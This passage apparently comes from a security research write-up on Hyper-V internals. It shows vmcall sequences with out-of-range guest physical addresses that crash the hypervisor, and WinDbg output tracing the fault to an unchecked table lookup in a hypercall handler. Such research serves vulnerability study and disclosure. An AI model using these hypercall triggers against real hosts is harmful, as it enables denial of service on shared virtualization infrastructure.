<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 1..40 (max value): </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFFFFh</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFFFEh</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 41..52 (min value): </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10000000000</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10000000001</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">h</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 41..52 (middle value)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">200000000000h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">200000000001h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">range 41..52 (max value)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FFFFFFFFFFFE</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: maroon; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r8</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, FFFFFFFFFFFF</span><span style="background-color: white; color: navy; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmcall</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Consolas; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">on the middle value 41..52 range of we see exception in debugger attaching to hypervisor (therefore not need test 53..64 range):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">FFFFF800060F133F: The instruction at 0xFFFFF800060F133F referenced memory at 0x0. The memory could not be written -> 0000000000000000 (exc.code c0000005, tid 1). </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If we continue executing, hypervisor will hang. In VMware it will be hanging, on physical host we get BSOD:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1: kd> !analyze -v</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HYPERVISOR_ERROR (20001)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypervisor has encountered a fatal error.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arguments:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arg1: 0000000000000011</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arg2: 00000000002b433f</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arg3: 0000000000001005</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Arg4: ffffe80100203b60</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stack:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1: kd> k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bbd8 fffff801`4ab7094c nt!KeBugCheckEx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bbe0 fffff801`4abdf0a8 nt!HvlNmiCallbackRoutine+0x54</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bc20 fffff801`4aa5c102 nt! ?? ::FNODOBFM::`string'+0x14702</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bc70 fffff801`4aa5bf73 nt!KxNmiInterrupt+0x82</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e0bdb0 fffff801`4aba0664 nt!KiNmiInterrupt+0x173</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e29890 fffff801`4aab22ec nt!PpmIdleGuestExecute+0x1c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e298c0 fffff801`4aab1be0 nt!PpmIdleExecuteTransition+0x47b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e29ae0 fffff801`4aa8898c nt!PoIdle+0x460</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff880`02e29c60 00000000`00000000 nt!KiIdleLoop+0x2c</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mBSOD_Handle64VmcallMemory – function where we see BSOD.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="300" src="https://lh5.googleusercontent.com/f18ZB_CnKZYCwRnLJQZwVhkKYiHDz598Qq9yKFV27qFyn-e2FQT2AMVqMc18vSiyuW8SrC8dRYIaHvWzdEFJdDVBggiBmqlTBj4cjUwUuCYNahdXjuOrMSdAQu4QyF4FFxRPfcbB7RoQol4-nQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="475" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Try to know more detailed conditions for BSOD. On </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mov r8, [r8+rax*8]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction, which caused BSOD:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r @r8</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=ffffc80000000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r @rax</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rax=0000000200000000 – </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> shr 0xC</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go up on xrefs and name every parent function as mBSOD_L<№>. When we go to mBSOD_L3 function, we see that it is called from mParseVMExit.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="73" src="https://lh6.googleusercontent.com/yU_HFTfy1XqhkbrYASlHcOHOE0Rtyatp4cyUZmLa3kko2LUPKvs0Bd8iXbQLci6F741URNMW4HicXWDniIisVQ-Bd8hoVLuI_708Od4JySX5AQNC58azQWsEzmlOOlFdACvQ_zr5yCkDT_lu1Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="244" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In memory with address 0xffffc80000000000 we see structure, which contains SPA entries describing guest OS address space - one element (8 bytes) for one guest OS physical page. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dd 0 – in guest OS</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 0 f000eef3 f000eef3 f000e2c3 f000eef3</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 10 f000eef3 f000ff54 f00000bf f0000067</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 20 f000fea5 f000e987 f000eef3 f000eef3</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 30 f000eef3 f000eef3 f000ef57 f000ff53</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 40 c8001148 f000f84d f000f841 f0001558</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 50 f000e739 f000f859 f000e82e f000860e</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 60 f000e000 f000e6f2 f000fe6e f000ff53</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 70 f000ff53 f000f0a4 f000efc7 c0002ff5</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc ffffc80000000000 – first table entry in hypervisor address space</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc800`00000000 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">20600077</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">80000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 20601077 80000000 w.` ....w.` ....</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc800`00000010 20602077 80000000 20603077 80000000 w ` ....w0` ....</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc800`00000020 02902075 82000000 20605077 80000000 u ......wP` ....</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!dd 8000000020600000 </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600000 f000eef3 f000eef3 f000e2c3 f000eef3</span></div>
